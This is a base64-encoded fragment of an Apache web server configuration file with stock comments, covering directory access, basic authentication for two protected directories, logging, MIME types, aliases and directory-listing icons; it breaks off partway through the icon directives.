CiMgTm90ZSB0aGF0IGZyb20gdGhpcyBwb2ludCBmb3J3YXJkIHlvdSBtdXN0IHNwZWNpZmljYWxs eSBhbGxvdwojIHBhcnRpY3VsYXIgZmVhdHVyZXMgdG8gYmUgZW5hYmxlZCAtIHNvIGlmIHNvbWV0 aGluZydzIG5vdCB3b3JraW5nIGFzCiMgeW91IG1pZ2h0IGV4cGVjdCwgbWFrZSBzdXJlIHRoYXQg eW91IGhhdmUgc3BlY2lmaWNhbGx5IGVuYWJsZWQgaXQKIyBiZWxvdy4KIwoKIwojIFRoaXMgc2hv dWxkIGJlIGNoYW5nZWQgdG8gd2hhdGV2ZXIgeW91IHNldCBEb2N1bWVudFJvb3QgdG8uCiMKPERp cmVjdG9yeSAiL3Zhci93d3cvaHRtbCI+CgojCiMgVGhpcyBtYXkgYWxzbyBiZSAiTm9uZSIsICJB bGwiLCBvciBhbnkgY29tYmluYXRpb24gb2YgIkluZGV4ZXMiLAojICJJbmNsdWRlcyIsICJGb2xs b3dTeW1MaW5rcyIsICJFeGVjQ0dJIiwgb3IgIk11bHRpVmlld3MiLgojCiMgTm90ZSB0aGF0ICJN dWx0aVZpZXdzIiBtdXN0IGJlIG5hbWVkICpleHBsaWNpdGx5KiAtLS0gIk9wdGlvbnMgQWxsIgoj IGRvZXNuJ3QgZ2l2ZSBpdCB0byB5b3UuCiMKICAgIE9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1M aW5rcwoKIwojIFRoaXMgY29udHJvbHMgd2hpY2ggb3B0aW9ucyB0aGUgLmh0YWNjZXNzIGZpbGVz IGluIGRpcmVjdG9yaWVzIGNhbgojIG92ZXJyaWRlLiBDYW4gYWxzbyBiZSAiQWxsIiwgb3IgYW55 IGNvbWJpbmF0aW9uIG9mICJPcHRpb25zIiwgIkZpbGVJbmZvIiwgCiMgIkF1dGhDb25maWciLCBh bmQgIkxpbWl0IgojCiAgICBBbGxvd092ZXJyaWRlIE5vbmUKCiMKIyBDb250cm9scyB3aG8gY2Fu IGdldCBzdHVmZiBmcm9tIHRoaXMgc2VydmVyLgojCiAgICBPcmRlciBhbGxvdyxkZW55CiAgICBB bGxvdyBmcm9tIGFsbAo8L0RpcmVjdG9yeT4KCgo8RGlyZWN0b3J5IC92YXIvd3d3L2h0bWwvZ2lt cy8gPgoKQXV0aFVzZXJGaWxlIC9ldGMvaHR0cGQvY29uZi8uaHRwYXNzd2QKQXV0aEdyb3VwRmls ZSAvZXRjL2h0dHBkL2NvbmYvLmh0Z3JvdXAKQXV0aE5hbWUgIEdJTVNfT05FCkF1dGhUeXBlIEJh c2ljCgo8TGltaXQgR0VUPgoKcmVxdWlyZSBncm91cCBnaW1zCgo8L0xpbWl0PgoKIyBFcnJvckRv Y3VtZW50IDQwMSAvcGhvdG9zLwoKPC9EaXJlY3Rvcnk+CgoKCjxEaXJlY3RvcnkgL3Zhci93d3cv aHRtbC9naW1zMi8gPgoKQXV0aFVzZXJGaWxlIC9ldGMvaHR0cGQvY29uZi8uaHRwYXNzd2QKQXV0 aEdyb3VwRmlsZSAvZXRjL2h0dHBkL2NvbmYvLmh0Z3JvdXAKQXV0aE5hbWUgIEdJTVNfREVWRUxP UE1FTlQKQXV0aFR5cGUgQmFzaWMKCjxMaW1pdCBHRVQ+CgpyZXF1aXJlIGdyb3VwIGdpbXNfZGV2 Cgo8L0xpbWl0PgoKIyBFcnJvckRvY3VtZW50IDQwMSAvcGhvdG9zLwoKPC9EaXJlY3Rvcnk+CgoK CiMKIyBVc2VyRGlyOiBUaGUgbmFtZSBvZiB0aGUgZGlyZWN0b3J5IHdoaWNoIGlzIGFwcGVuZGVk IG9udG8gYSB1c2VyJ3MgaG9tZQojIGRpcmVjdG9yeSBpZiBhIH51c2VyIHJlcXVlc3QgaXMgcmVj ZWl2ZWQuCiMKIyBUaGUgcGF0aCB0byB0aGUgZW5kIHVzZXIgYWNjb3VudCAncHVibGljX2h0bWwn IGRpcmVjdG9yeSBtdXN0IGJlCiMgYWNjZXNzaWJsZSB0byB0aGUgd2Vic2VydmVyIHVzZXJpZC4g IFRoaXMgdXN1YWxseSBtZWFucyB0aGF0IH51c2VyaWQKIyBtdXN0IGhhdmUgcGVybWlzc2lvbnMg b2YgNzExLCB+dXNlcmlkL3B1YmxpY19odG1sIG11c3QgaGF2ZSBwZXJtaXNzaW9ucwojIG9mIDc1 NSwgYW5kIGRvY3VtZW50cyBjb250YWluZWQgdGhlcmVpbiBtdXN0IGJlIHdvcmxkLXJlYWRhYmxl LgojIE90aGVyd2lzZSwgdGhlIGNsaWVudCB3aWxsIG9ubHkgcmVjZWl2ZSBhICI0MDMgRm9yYmlk ZGVuIiBtZXNzYWdlLgojCiMgU2VlIGFsc286IGh0dHA6Ly9odHRwZC5hcGFjaGUub3JnL2RvY3Mv bWlzYy9GQVEuaHRtbCNmb3JiaWRkZW4KIwo8SWZNb2R1bGUgbW9kX3VzZXJkaXIuYz4KICAgIFVz ZXJEaXIgcHVibGljX2h0bWwKPC9JZk1vZHVsZT4KCiMKIyBDb250cm9sIGFjY2VzcyB0byBVc2Vy RGlyIGRpcmVjdG9yaWVzLiAgVGhlIGZvbGxvd2luZyBpcyBhbiBleGFtcGxlCiMgZm9yIGEgc2l0 ZSB3aGVyZSB0aGVzZSBkaXJlY3RvcmllcyBhcmUgcmVzdHJpY3RlZCB0byByZWFkLW9ubHkuCiMK IzxEaXJlY3RvcnkgL2hvbWUvKi9wdWJsaWNfaHRtbD4KIyAgICBBbGxvd092ZXJyaWRlIEZpbGVJ bmZvIEF1dGhDb25maWcgTGltaXQKIyAgICBPcHRpb25zIE11bHRpVmlld3MgSW5kZXhlcyBTeW1M aW5rc0lmT3duZXJNYXRjaCBJbmNsdWRlc05vRXhlYwojICAgIDxMaW1pdCBHRVQgUE9TVCBPUFRJ T05TIFBST1BGSU5EPgojICAgICAgICBPcmRlciBhbGxvdyxkZW55CiMgICAgICAgIEFsbG93IGZy b20gYWxsCiMgICAgPC9MaW1pdD4KIyAgICA8TGltaXRFeGNlcHQgR0VUIFBPU1QgT1BUSU9OUyBQ Uk9QRklORD4KIyAgICAgICAgT3JkZXIgZGVueSxhbGxvdwojICAgICAgICBEZW55IGZyb20gYWxs CiMgICAgPC9MaW1pdEV4Y2VwdD4KIzwvRGlyZWN0b3J5PgoKIwojIERpcmVjdG9yeUluZGV4OiBO YW1lIG9mIHRoZSBmaWxlIG9yIGZpbGVzIHRvIHVzZSBhcyBhIHByZS13cml0dGVuIEhUTUwKIyBk aXJlY3RvcnkgaW5kZXguICBTZXBhcmF0ZSBtdWx0aXBsZSBlbnRyaWVzIHdpdGggc3BhY2VzLgoj CjxJZk1vZHVsZSBtb2RfZGlyLmM+CiAgICBEaXJlY3RvcnlJbmRleCBpbmRleC5odG1sIGluZGV4 Lmh0bSBpbmRleC5zaHRtbCBpbmRleC5waHAgaW5kZXgucGhwNCBpbmRleC5waHAzIGluZGV4LnBo dG1sIGluZGV4LmNnaSBpbmRleC5seHAKPC9JZk1vZHVsZT4KCiMKIyBBY2Nlc3NGaWxlTmFtZTog VGhlIG5hbWUgb2YgdGhlIGZpbGUgdG8gbG9vayBmb3IgaW4gZWFjaCBkaXJlY3RvcnkKIyBmb3Ig YWNjZXNzIGNvbnRyb2wgaW5mb3JtYXRpb24uCiMKQWNjZXNzRmlsZU5hbWUgLmh0YWNjZXNzCgoj CiMgVGhlIGZvbGxvd2luZyBsaW5lcyBwcmV2ZW50IC5odGFjY2VzcyBmaWxlcyBmcm9tIGJlaW5n IHZpZXdlZCBieQojIFdlYiBjbGllbnRzLiAgU2luY2UgLmh0YWNjZXNzIGZpbGVzIG9mdGVuIGNv bnRhaW4gYXV0aG9yaXphdGlvbgojIGluZm9ybWF0aW9uLCBhY2Nlc3MgaXMgZGlzYWxsb3dlZCBm b3Igc2VjdXJpdHkgcmVhc29ucy4gIENvbW1lbnQKIyB0aGVzZSBsaW5lcyBvdXQgaWYgeW91IHdh bnQgV2ViIHZpc2l0b3JzIHRvIHNlZSB0aGUgY29udGVudHMgb2YKIyAuaHRhY2Nlc3MgZmlsZXMu ICBJZiB5b3UgY2hhbmdlIHRoZSBBY2Nlc3NGaWxlTmFtZSBkaXJlY3RpdmUgYWJvdmUsCiMgYmUg c3VyZSB0byBtYWtlIHRoZSBjb3JyZXNwb25kaW5nIGNoYW5nZXMgaGVyZS4KIwojIEFsc28sIGZv bGtzIHRlbmQgdG8gdXNlIG5hbWVzIHN1Y2ggYXMgLmh0cGFzc3dkIGZvciBwYXNzd29yZAojIGZp bGVzLCBzbyB0aGlzIHdpbGwgcHJvdGVjdCB0aG9zZSBhcyB3ZWxsLgojCjxGaWxlcyB+ICJeXC5o dCI+CiAgICBPcmRlciBhbGxvdyxkZW55CiAgICBEZW55IGZyb20gYWxsCjwvRmlsZXM+CgojCiMg Q2FjaGVOZWdvdGlhdGVkRG9jczogQnkgZGVmYXVsdCwgQXBhY2hlIHNlbmRzICJQcmFnbWE6IG5v LWNhY2hlIiB3aXRoIGVhY2gKIyBkb2N1bWVudCB0aGF0IHdhcyBuZWdvdGlhdGVkIG9uIHRoZSBi YXNpcyBvZiBjb250ZW50LiBUaGlzIGFza3MgcHJveHkKIyBzZXJ2ZXJzIG5vdCB0byBjYWNoZSB0 aGUgZG9jdW1lbnQuIFVuY29tbWVudGluZyB0aGUgZm9sbG93aW5nIGxpbmUgZGlzYWJsZXMKIyB0 aGlzIGJlaGF2aW9yLCBhbmQgcHJveGllcyB3aWxsIGJlIGFsbG93ZWQgdG8gY2FjaGUgdGhlIGRv Y3VtZW50cy4KIwojQ2FjaGVOZWdvdGlhdGVkRG9jcwoKIwojIFVzZUNhbm9uaWNhbE5hbWU6ICAo bmV3IGZvciAxLjMpICBXaXRoIHRoaXMgc2V0dGluZyB0dXJuZWQgb24sIHdoZW5ldmVyCiMgQXBh Y2hlIG5lZWRzIHRvIGNvbnN0cnVjdCBhIHNlbGYtcmVmZXJlbmNpbmcgVVJMIChhIFVSTCB0aGF0 IHJlZmVycyBiYWNrCiMgdG8gdGhlIHNlcnZlciB0aGUgcmVzcG9uc2UgaXMgY29taW5nIGZyb20p IGl0IHdpbGwgdXNlIFNlcnZlck5hbWUgYW5kCiMgUG9ydCB0byBmb3JtIGEgImNhbm9uaWNhbCIg bmFtZS4gIFdpdGggdGhpcyBzZXR0aW5nIG9mZiwgQXBhY2hlIHdpbGwKIyB1c2UgdGhlIGhvc3Ru YW1lOnBvcnQgdGhhdCB0aGUgY2xpZW50IHN1cHBsaWVkLCB3aGVuIHBvc3NpYmxlLiAgVGhpcwoj IGFsc28gYWZmZWN0cyBTRVJWRVJfTkFNRSBhbmQgU0VSVkVSX1BPUlQgaW4gQ0dJIHNjcmlwdHMu CiMKVXNlQ2Fub25pY2FsTmFtZSBPbgoKIwojIFR5cGVzQ29uZmlnIGRlc2NyaWJlcyB3aGVyZSB0 aGUgbWltZS50eXBlcyBmaWxlIChvciBlcXVpdmFsZW50KSBpcwojIHRvIGJlIGZvdW5kLgojCjxJ Zk1vZHVsZSBtb2RfbWltZS5jPgogICAgVHlwZXNDb25maWcgL2V0Yy9taW1lLnR5cGVzCjwvSWZN b2R1bGU+CgojCiMgRGVmYXVsdFR5cGUgaXMgdGhlIGRlZmF1bHQgTUlNRSB0eXBlIHRoZSBzZXJ2 ZXIgd2lsbCB1c2UgZm9yIGEgZG9jdW1lbnQKIyBpZiBpdCBjYW5ub3Qgb3RoZXJ3aXNlIGRldGVy bWluZSBvbmUsIHN1Y2ggYXMgZnJvbSBmaWxlbmFtZSBleHRlbnNpb25zLgojIElmIHlvdXIgc2Vy dmVyIGNvbnRhaW5zIG1vc3RseSB0ZXh0IG9yIEhUTUwgZG9jdW1lbnRzLCAidGV4dC9wbGFpbiIg aXMKIyBhIGdvb2QgdmFsdWUuICBJZiBtb3N0IG9mIHlvdXIgY29udGVudCBpcyBiaW5hcnksIHN1 Y2ggYXMgYXBwbGljYXRpb25zCiMgb3IgaW1hZ2VzLCB5b3UgbWF5IHdhbnQgdG8gdXNlICJhcHBs aWNhdGlvbi9vY3RldC1zdHJlYW0iIGluc3RlYWQgdG8KIyBrZWVwIGJyb3dzZXJzIGZyb20gdHJ5 aW5nIHRvIGRpc3BsYXkgYmluYXJ5IGZpbGVzIGFzIHRob3VnaCB0aGV5IGFyZQojIHRleHQuCiMK RGVmYXVsdFR5cGUgdGV4dC9wbGFpbgoKIwojIFRoZSBtb2RfbWltZV9tYWdpYyBtb2R1bGUgYWxs b3dzIHRoZSBzZXJ2ZXIgdG8gdXNlIHZhcmlvdXMgaGludHMgZnJvbSB0aGUKIyBjb250ZW50cyBv ZiB0aGUgZmlsZSBpdHNlbGYgdG8gZGV0ZXJtaW5lIGl0cyB0eXBlLiAgVGhlIE1JTUVNYWdpY0Zp bGUKIyBkaXJlY3RpdmUgdGVsbHMgdGhlIG1vZHVsZSB3aGVyZSB0aGUgaGludCBkZWZpbml0aW9u cyBhcmUgbG9jYXRlZC4KIyBtb2RfbWltZV9tYWdpYyBpcyBub3QgcGFydCBvZiB0aGUgZGVmYXVs dCBzZXJ2ZXIgKHlvdSBoYXZlIHRvIGFkZAojIGl0IHlvdXJzZWxmIHdpdGggYSBMb2FkTW9kdWxl IFtzZWUgdGhlIERTTyBwYXJhZ3JhcGggaW4gdGhlICdHbG9iYWwKIyBFbnZpcm9ubWVudCcgc2Vj dGlvbl0sIG9yIHJlY29tcGlsZSB0aGUgc2VydmVyIGFuZCBpbmNsdWRlIG1vZF9taW1lX21hZ2lj CiMgYXMgcGFydCBvZiB0aGUgY29uZmlndXJhdGlvbiksIHNvIGl0J3MgZW5jbG9zZWQgaW4gYW4g PElmTW9kdWxlPiBjb250YWluZXIuCiMgVGhpcyBtZWFucyB0aGF0IHRoZSBNSU1FTWFnaWNGaWxl IGRpcmVjdGl2ZSB3aWxsIG9ubHkgYmUgcHJvY2Vzc2VkIGlmIHRoZQojIG1vZHVsZSBpcyBwYXJ0 IG9mIHRoZSBzZXJ2ZXIuCiMKPElmTW9kdWxlIG1vZF9taW1lX21hZ2ljLmM+CiMgICBNSU1FTWFn aWNGaWxlIC91c3Ivc2hhcmUvbWFnaWMubWltZQogICAgTUlNRU1hZ2ljRmlsZSBjb25mL21hZ2lj CjwvSWZNb2R1bGU+CgojCiMgSG9zdG5hbWVMb29rdXBzOiBMb2cgdGhlIG5hbWVzIG9mIGNsaWVu dHMgb3IganVzdCB0aGVpciBJUCBhZGRyZXNzZXMKIyBlLmcuLCB3d3cuYXBhY2hlLm9yZyAob24p IG9yIDIwNC42Mi4xMjkuMTMyIChvZmYpLgojIFRoZSBkZWZhdWx0IGlzIG9mZiBiZWNhdXNlIGl0 J2QgYmUgb3ZlcmFsbCBiZXR0ZXIgZm9yIHRoZSBuZXQgaWYgcGVvcGxlCiMgaGFkIHRvIGtub3dp bmdseSB0dXJuIHRoaXMgZmVhdHVyZSBvbiwgc2luY2UgZW5hYmxpbmcgaXQgbWVhbnMgdGhhdAoj IGVhY2ggY2xpZW50IHJlcXVlc3Qgd2lsbCByZXN1bHQgaW4gQVQgTEVBU1Qgb25lIGxvb2t1cCBy ZXF1ZXN0IHRvIHRoZQojIG5hbWVzZXJ2ZXIuCiMKSG9zdG5hbWVMb29rdXBzIE9mZgoKIwojIEVy cm9yTG9nOiBUaGUgbG9jYXRpb24gb2YgdGhlIGVycm9yIGxvZyBmaWxlLgojIElmIHlvdSBkbyBu b3Qgc3BlY2lmeSBhbiBFcnJvckxvZyBkaXJlY3RpdmUgd2l0aGluIGEgPFZpcnR1YWxIb3N0Pgoj IGNvbnRhaW5lciwgZXJyb3IgbWVzc2FnZXMgcmVsYXRpbmcgdG8gdGhhdCB2aXJ0dWFsIGhvc3Qg d2lsbCBiZQojIGxvZ2dlZCBoZXJlLiAgSWYgeW91ICpkbyogZGVmaW5lIGFuIGVycm9yIGxvZ2Zp bGUgZm9yIGEgPFZpcnR1YWxIb3N0PgojIGNvbnRhaW5lciwgdGhhdCBob3N0J3MgZXJyb3JzIHdp bGwgYmUgbG9nZ2VkIHRoZXJlIGFuZCBub3QgaGVyZS4KIwpFcnJvckxvZyBsb2dzL2Vycm9yX2xv ZwoKIwojIExvZ0xldmVsOiBDb250cm9sIHRoZSBudW1iZXIgb2YgbWVzc2FnZXMgbG9nZ2VkIHRv IHRoZSBlcnJvcl9sb2cuCiMgUG9zc2libGUgdmFsdWVzIGluY2x1ZGU6IGRlYnVnLCBpbmZvLCBu b3RpY2UsIHdhcm4sIGVycm9yLCBjcml0LAojIGFsZXJ0LCBlbWVyZy4KIwpMb2dMZXZlbCB3YXJu CgojCiMgVGhlIGZvbGxvd2luZyBkaXJlY3RpdmVzIGRlZmluZSBzb21lIGZvcm1hdCBuaWNrbmFt ZXMgZm9yIHVzZSB3aXRoCiMgYSBDdXN0b21Mb2cgZGlyZWN0aXZlIChzZWUgYmVsb3cpLgojCkxv Z0Zvcm1hdCAiJWggJWwgJXUgJXQgXCIlclwiICU+cyAlYiBcIiV7UmVmZXJlcn1pXCIgXCIle1Vz ZXItQWdlbnR9aVwiIiBjb21iaW5lZApMb2dGb3JtYXQgIiVoICVsICV1ICV0IFwiJXJcIiAlPnMg JWIiIGNvbW1vbgpMb2dGb3JtYXQgIiV7UmVmZXJlcn1pIC0+ICVVIiByZWZlcmVyCkxvZ0Zvcm1h dCAiJXtVc2VyLWFnZW50fWkiIGFnZW50CgojCiMgVGhlIGxvY2F0aW9uIGFuZCBmb3JtYXQgb2Yg dGhlIGFjY2VzcyBsb2dmaWxlIChDb21tb24gTG9nZmlsZSBGb3JtYXQpLgojIElmIHlvdSBkbyBu b3QgZGVmaW5lIGFueSBhY2Nlc3MgbG9nZmlsZXMgd2l0aGluIGEgPFZpcnR1YWxIb3N0PgojIGNv bnRhaW5lciwgdGhleSB3aWxsIGJlIGxvZ2dlZCBoZXJlLiAgQ29udHJhcml3aXNlLCBpZiB5b3Ug KmRvKgojIGRlZmluZSBwZXItPFZpcnR1YWxIb3N0PiBhY2Nlc3MgbG9nZmlsZXMsIHRyYW5zYWN0 aW9ucyB3aWxsIGJlCiMgbG9nZ2VkIHRoZXJlaW4gYW5kICpub3QqIGluIHRoaXMgZmlsZS4KIwoj IEN1c3RvbUxvZyAvdmFyL2xvZy9odHRwZC9hY2Nlc3NfbG9nIGNvbW1vbgpDdXN0b21Mb2cgbG9n cy9hY2Nlc3NfbG9nIGNvbWJpbmVkCgojCiMgSWYgeW91IHdvdWxkIGxpa2UgdG8gaGF2ZSBhZ2Vu dCBhbmQgcmVmZXJlciBsb2dmaWxlcywgdW5jb21tZW50IHRoZQojIGZvbGxvd2luZyBkaXJlY3Rp dmVzLgojCiNDdXN0b21Mb2cgbG9ncy9yZWZlcmVyX2xvZyByZWZlcmVyCiNDdXN0b21Mb2cgbG9n cy9hZ2VudF9sb2cgYWdlbnQKCiMKIyBJZiB5b3UgcHJlZmVyIGEgc2luZ2xlIGxvZ2ZpbGUgd2l0 aCBhY2Nlc3MsIGFnZW50LCBhbmQgcmVmZXJlciBpbmZvcm1hdGlvbgojIChDb21iaW5lZCBMb2dm aWxlIEZvcm1hdCkgeW91IGNhbiB1c2UgdGhlIGZvbGxvd2luZyBkaXJlY3RpdmUuCiMKI0N1c3Rv bUxvZyBsb2dzL2FjY2Vzc19sb2cgY29tYmluZWQKCiMKIyBPcHRpb25hbGx5IGFkZCBhIGxpbmUg Y29udGFpbmluZyB0aGUgc2VydmVyIHZlcnNpb24gYW5kIHZpcnR1YWwgaG9zdAojIG5hbWUgdG8g c2VydmVyLWdlbmVyYXRlZCBwYWdlcyAoZXJyb3IgZG9jdW1lbnRzLCBGVFAgZGlyZWN0b3J5IGxp c3RpbmdzLAojIG1vZF9zdGF0dXMgYW5kIG1vZF9pbmZvIG91dHB1dCBldGMuLCBidXQgbm90IENH SSBnZW5lcmF0ZWQgZG9jdW1lbnRzKS4KIyBTZXQgdG8gIkVNYWlsIiB0byBhbHNvIGluY2x1ZGUg YSBtYWlsdG86IGxpbmsgdG8gdGhlIFNlcnZlckFkbWluLgojIFNldCB0byBvbmUgb2Y6ICBPbiB8 IE9mZiB8IEVNYWlsCiMKU2VydmVyU2lnbmF0dXJlIE9uCgojIEVCQ0RJQyBjb25maWd1cmF0aW9u OgojIChvbmx5IGZvciBtYWluZnJhbWVzIHVzaW5nIHRoZSBFQkNESUMgY29kZXNldCwgY3VycmVu dGx5IG9uZSBvZjoKIyBGdWppdHN1LVNpZW1lbnMnIEJTMjAwMC9PU0QsIElCTSdzIE9TLzM5MCBh bmQgSUJNJ3MgVFBGKSEhCiMgVGhlIGZvbGxvd2luZyBkZWZhdWx0IGNvbmZpZ3VyYXRpb24gYXNz dW1lcyB0aGF0ICJ0ZXh0IGZpbGVzIgojIGFyZSBzdG9yZWQgaW4gRUJDRElDIChzbyB0aGF0IHlv dSBjYW4gb3BlcmF0ZSBvbiB0aGVtIHVzaW5nIHRoZQojIG5vcm1hbCBQT1NJWCB0b29scyBsaWtl IGdyZXAgYW5kIHNvcnQpIHdoaWxlICJiaW5hcnkgZmlsZXMiIGFyZQojIHN0b3JlZCB3aXRoIGlk ZW50aWNhbCBvY3RldHMgYXMgb24gYW4gQVNDSUkgbWFjaGluZS4KIwojIFRoZSBkaXJlY3RpdmVz IGFyZSBldmFsdWF0ZWQgaW4gY29uZmlndXJhdGlvbiBmaWxlIG9yZGVyLCB3aXRoCiMgdGhlIEVC Q0RJQ0NvbnZlcnQgZGlyZWN0aXZlcyBhcHBsaWVkIGJlZm9yZSBFQkNESUNDb252ZXJ0QnlUeXBl LgojCiMgSWYgeW91IHdhbnQgdG8gaGF2ZSBBU0NJSSBIVE1MIGRvY3VtZW50cyBhbmQgRUJDRElD IEhUTUwgZG9jdW1lbnRzCiMgYXQgdGhlIHNhbWUgdGltZSwgeW91IGNhbiB1c2UgdGhlIGZpbGUg ZXh0ZW5zaW9uIHRvIGZvcmNlCiMgY29udmVyc2lvbiBvZmYgZm9yIHRoZSBBU0NJSSBkb2N1bWVu dHM6CiMgPiBBZGRUeXBlICAgICAgIHRleHQvaHRtbCAuYWh0bWwKIyA+IEVCQ0RJQ0NvbnZlcnQg T2ZmPUluT3V0IC5haHRtbAojCiMgRUJDRElDQ29udmVydEJ5VHlwZSAgT249SW5PdXQgdGV4dC8q IG1lc3NhZ2UvKiBtdWx0aXBhcnQvKgojIEVCQ0RJQ0NvbnZlcnRCeVR5cGUgIE9uPUluICAgIGFw cGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZAojIEVCQ0RJQ0NvbnZlcnRCeVR5cGUgIE9u PUluT3V0IGFwcGxpY2F0aW9uL3Bvc3RzY3JpcHQgbW9kZWwvdnJtbAojIEVCQ0RJQ0NvbnZlcnRC eVR5cGUgT2ZmPUluT3V0ICovKgoKCiMKIyBBbGlhc2VzOiBBZGQgaGVyZSBhcyBtYW55IGFsaWFz ZXMgYXMgeW91IG5lZWQgKHdpdGggbm8gbGltaXQpLiBUaGUgZm9ybWF0IGlzIAojIEFsaWFzIGZh a2VuYW1lIHJlYWxuYW1lCiMKPElmTW9kdWxlIG1vZF9hbGlhcy5jPgoKICAgICMKICAgICMgTm90 ZSB0aGF0IGlmIHlvdSBpbmNsdWRlIGEgdHJhaWxpbmcgLyBvbiBmYWtlbmFtZSB0aGVuIHRoZSBz ZXJ2ZXIgd2lsbAogICAgIyByZXF1aXJlIGl0IHRvIGJlIHByZXNlbnQgaW4gdGhlIFVSTC4gIFNv ICIvaWNvbnMiIGlzbid0IGFsaWFzZWQgaW4gdGhpcwogICAgIyBleGFtcGxlLCBvbmx5ICIvaWNv bnMvIi4gIElmIHRoZSBmYWtlbmFtZSBpcyBzbGFzaC10ZXJtaW5hdGVkLCB0aGVuIHRoZSAKICAg ICMgcmVhbG5hbWUgbXVzdCBhbHNvIGJlIHNsYXNoIHRlcm1pbmF0ZWQsIGFuZCBpZiB0aGUgZmFr ZW5hbWUgb21pdHMgdGhlIAogICAgIyB0cmFpbGluZyBzbGFzaCwgdGhlIHJlYWxuYW1lIG11c3Qg YWxzbyBvbWl0IGl0LgogICAgIwogICAgQWxpYXMgL2ljb25zLyAiL3Zhci93d3cvaWNvbnMvIgoK ICAgIDxEaXJlY3RvcnkgIi92YXIvd3d3L2ljb25zIj4KICAgICAgICBPcHRpb25zIEluZGV4ZXMg TXVsdGlWaWV3cwogICAgICAgIEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9yZGVyIGFsbG93 LGRlbnkKICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+CgogICAgIwogICAg IyBTY3JpcHRBbGlhczogVGhpcyBjb250cm9scyB3aGljaCBkaXJlY3RvcmllcyBjb250YWluIHNl cnZlciBzY3JpcHRzLgogICAgIyBTY3JpcHRBbGlhc2VzIGFyZSBlc3NlbnRpYWxseSB0aGUgc2Ft ZSBhcyBBbGlhc2VzLCBleGNlcHQgdGhhdAogICAgIyBkb2N1bWVudHMgaW4gdGhlIHJlYWxuYW1l IGRpcmVjdG9yeSBhcmUgdHJlYXRlZCBhcyBhcHBsaWNhdGlvbnMgYW5kCiAgICAjIHJ1biBieSB0 aGUgc2VydmVyIHdoZW4gcmVxdWVzdGVkIHJhdGhlciB0aGFuIGFzIGRvY3VtZW50cyBzZW50IHRv IHRoZSBjbGllbnQuCiAgICAjIFRoZSBzYW1lIHJ1bGVzIGFib3V0IHRyYWlsaW5nICIvIiBhcHBs eSB0byBTY3JpcHRBbGlhcyBkaXJlY3RpdmVzIGFzIHRvCiAgICAjIEFsaWFzLgogICAgIwogICAg U2NyaXB0QWxpYXMgL2NnaS1iaW4vICIvdmFyL3d3dy9jZ2ktYmluLyIKCiAgICAjCiAgICAjICIv dmFyL3d3dy9jZ2ktYmluIiBzaG91bGQgYmUgY2hhbmdlZCB0byB3aGF0ZXZlciB5b3VyIFNjcmlw dEFsaWFzZWQKICAgICMgQ0dJIGRpcmVjdG9yeSBleGlzdHMsIGlmIHlvdSBoYXZlIHRoYXQgY29u ZmlndXJlZC4KICAgICMKICAgIDxEaXJlY3RvcnkgIi92YXIvd3d3L2NnaS1iaW4iPgogICAgICAg IEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9wdGlvbnMgTm9uZQogICAgICAgIE9yZGVyIGFs bG93LGRlbnkKICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+Cgo8L0lmTW9k dWxlPgojIEVuZCBvZiBhbGlhc2VzLgoKIwojIFJlZGlyZWN0IGFsbG93cyB5b3UgdG8gdGVsbCBj bGllbnRzIGFib3V0IGRvY3VtZW50cyB3aGljaCB1c2VkIHRvIGV4aXN0IGluCiMgeW91ciBzZXJ2 ZXIncyBuYW1lc3BhY2UsIGJ1dCBkbyBub3QgYW55bW9yZS4gVGhpcyBhbGxvd3MgeW91IHRvIHRl bGwgdGhlCiMgY2xpZW50cyB3aGVyZSB0byBsb29rIGZvciB0aGUgcmVsb2NhdGVkIGRvY3VtZW50 LgojIEZvcm1hdDogUmVkaXJlY3Qgb2xkLVVSSSBuZXctVVJMCiMKCiMKIyBEaXJlY3RpdmVzIGNv bnRyb2xsaW5nIHRoZSBkaXNwbGF5IG9mIHNlcnZlci1nZW5lcmF0ZWQgZGlyZWN0b3J5IGxpc3Rp bmdzLgojCjxJZk1vZHVsZSBtb2RfYXV0b2luZGV4LmM+CgogICAgIwogICAgIyBGYW5jeUluZGV4 aW5nIGlzIHdoZXRoZXIgeW91IHdhbnQgZmFuY3kgZGlyZWN0b3J5IGluZGV4aW5nIG9yIHN0YW5k YXJkCiAgICAjCiAgICBJbmRleE9wdGlvbnMgRmFuY3lJbmRleGluZyBOYW1lV2lkdGg9KgoKICAg ICMKICAgICMgQWRkSWNvbiogZGlyZWN0aXZlcyB0ZWxsIHRoZSBzZXJ2ZXIgd2hpY2ggaWNvbiB0 byBzaG93IGZvciBkaWZmZXJlbnQKICAgICMgZmlsZXMgb3IgZmlsZW5hbWUgZXh0ZW5zaW9ucy4g IFRoZXNlIGFyZSBvbmx5IGRpc3BsYXllZCBmb3IKICAgICMgRmFuY3lJbmRleGVkIGRpcmVjdG9y aWVzLgogICAgIwogICAgQWRkSWNvbkJ5RW5jb2RpbmcgKENNUCwvaWNvbnMvY29tcHJlc3NlZC5n aWYpIHgtY29tcHJlc3MgeC1nemlwCgogICAgQWRkSWNvbkJ5VHlwZSAoVFhULC9pY29ucy90ZXh0 LmdpZikgdGV4dC8qCiAgICBBZGRJY29uQnlUeXBlIChJTUcsL2ljb25zL2ltYWdlMi5naWYpIGlt YWdlLyoKICAgIEFkZEljb25CeVR5cGUgKFNORCwvaWNvbnMvc291bmQyLmdpZikgYXVkaW8vKgog ICAgQWRkSWNvbkJ5VHlwZSAoVklELC9pY29ucy9tb3ZpZS5naWYpIHZpZGVvLyoKCiAgICBBZGRJ Y29uIC9pY29ucy9iaW5hcnkuZ2lmIC5iaW4gLmV4ZQogICAgQWRkSWNvbiAvaWNvbnMvYmluaGV4 LmdpZiAuaHF4CiAgICBBZGRJY29uIC9pY29ucy90YXIuZ2lmIC50YXIKICAgIEFkZEljb24gL2lj b25zL3dvcmxkMi5naWYgLndybCAud3JsLmd6IC52cm1sIC52cm0gLml2CiAgICBBZGRJY29uIC9p Y29ucy9jb21wcmVzc2VkLmdpZiAuWiAueiAudGd6IC5neiAuemlwCiAgICBBZGRJY29uIC9pY29u cy9hLmdpZiAucHMgLmFpIC5lcHMKICAgIEFkZEljb24gL2ljb25zL2xheW91dC5naWYgLmh0bWwg 